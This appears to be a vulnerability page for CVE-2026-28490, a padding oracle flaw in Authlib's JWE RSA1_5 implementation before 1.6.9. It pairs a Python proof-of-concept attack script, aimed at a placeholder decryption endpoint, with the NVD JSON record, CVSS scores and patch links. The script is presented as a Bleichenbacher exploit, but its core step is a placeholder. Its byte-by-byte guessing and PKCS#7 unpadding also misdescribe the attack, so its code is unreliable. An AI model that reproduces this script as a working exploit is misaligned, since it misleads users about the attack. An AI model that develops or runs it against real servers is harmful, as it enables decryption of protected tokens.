CVE-2026-28490

import requests import json # CVE-2026-28490 PoC - Padding Oracle Attack on Authlib JWE RSA1_5 # This is a simplified demonstration of the attack concept def create_crafted_ciphertext(original_ciphertext, target_block): """ Craft a modified ciphertext for oracle testing. In real attack, this would be modified to test different padding conditions. """ # Modify the ciphertext to test oracle responses modified = bytearray(original_ciphertext) modified[0] ^= 0x01 # Flip bits to potentially create valid-looking padding return bytes(modified) def padding_oracle_attack(target_url, encrypted_token): """ Perform padding oracle attack to decrypt JWE RSA1_5 encrypted tokens. Args: target_url: URL endpoint that decrypts JWE tokens encrypted_token: Base64-encoded JWE token Returns: Decrypted plaintext """ plaintext = b'' block_size = 256 # RSA-2048 block size # For each block, use oracle to recover plaintext for block_num in range(get_block_count(encrypted_token)): block_ciphertext = extract_block(encrypted_token, block_num) recovered_block = b'' # Oracle-guided decryption (Bleichenbacher style) for byte_pos in range(block_size): for guess in range(256): crafted = craft_ciphertext(block_ciphertext, byte_pos, guess) # Send to oracle and check response if oracle_check(target_url, crafted): # Valid padding found, extract byte recovered_block += bytes([guess]) break plaintext += recovered_block return unpad_pkcs7(plaintext) def oracle_check(url, ciphertext): """ Check if the padding oracle accepts the ciphertext. Returns True if padding is valid, False otherwise. """ response = requests.post(url, json={'token': ciphertext}) # Oracle responses that indicate padding validity if response.status_code == 200: return True elif 'padding' in response.text.lower() or 'decrypt' in response.text.lower(): return False else: # Invalid padding detected return False def craft_ciphertext(original, position, guess): """ Craft ciphertext for oracle testing at specific byte position. Implements the mathematical transformation needed for Bleichenbacher attack. """ # Simplified: In real attack, use RSA mathematical properties # to construct ciphertexts that will decrypt to values with specific byte patterns return original # Placeholder for actual implementation def get_block_count(encrypted_token): """Calculate number of RSA blocks in the encrypted token.""" return len(encrypted_token) // 256 def extract_block(token, block_num): """Extract specific RSA block from encrypted token.""" start = block_num * 256 return token[start:start + 256] def unpad_pkcs7(data): """Remove PKCS#7 padding from decrypted data.""" padding_len = data[-1] return data[:-padding_len] # Example vulnerable endpoint VULNERABLE_ENDPOINT = "https://example.com/api/decrypt" # Example encrypted JWE token ENCRYPTED_TOKEN = "eyJhbGciOiJSU0ExIn0..." # Truncated for example if __name__ == "__main__": print("CVE-2026-28490 - Authlib JWE RSA1_5 Padding Oracle PoC") print("=" * 60) print("Target: Authlib < 1.6.9 with JWE RSA1_5 algorithm") print("Vulnerability: Padding Oracle (Bleichenbacher variant)") print("=" * 60) # Note: This PoC demonstrates the attack concept # Actual implementation requires understanding the specific oracle behavior # and proper RSA mathematical transformations

{"cve": {"id": "CVE-2026-28490", "sourceIdentifier": "[email protected]", "published": "2026-03-16T18:16:07.557", "lastModified": "2026-03-17T20:45:45.573", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to version 1.6.9, a cryptographic padding oracle vulnerability was identified in the Authlib Python library concerning the implementation of the JSON Web Encryption (JWE) RSA1_5 key management algorithm. Authlib registers RSA1_5 in its default algorithm registry without requiring explicit opt-in, and actively destroys the constant-time Bleichenbacher mitigation that the underlying cryptography library implements correctly. This issue has been patched in version 1.6.9."}, {"lang": "es", "value": "Authlib es una biblioteca Python que construye servidores OAuth y OpenID Connect. Antes de la versión 1.6.9, se identificó una vulnerabilidad de oráculo de relleno criptográfico en la biblioteca Python Authlib relacionada con la implementación del algoritmo de gestión de claves RSA1_5 de JSON Web Encryption (JWE). Authlib registra RSA1_5 en su registro de algoritmos predeterminado sin requerir una aceptación explícita, y destruye activamente la mitigación de tiempo constante de Bleichenbacher que la biblioteca de criptografía subyacente implementa correctamente. Este problema ha sido parcheado en la versión 1.6.9."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-203"}, {"lang": "en", "value": "CWE-327"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:authlib:authlib:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.6.9", "matchCriteriaId": "8C677FEC-2094-49D8-ABAB-F740B6F83D38"}]}]}], "references": [{"url": "https://github.com/authlib/authlib/commit/48b345f29f6c459f11c6a40162b6c0b742ef2e22", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/authlib/authlib/releases/tag/v1.6.9", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/authlib/authlib/security/advisories/GHSA-7432-952r-cw78", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}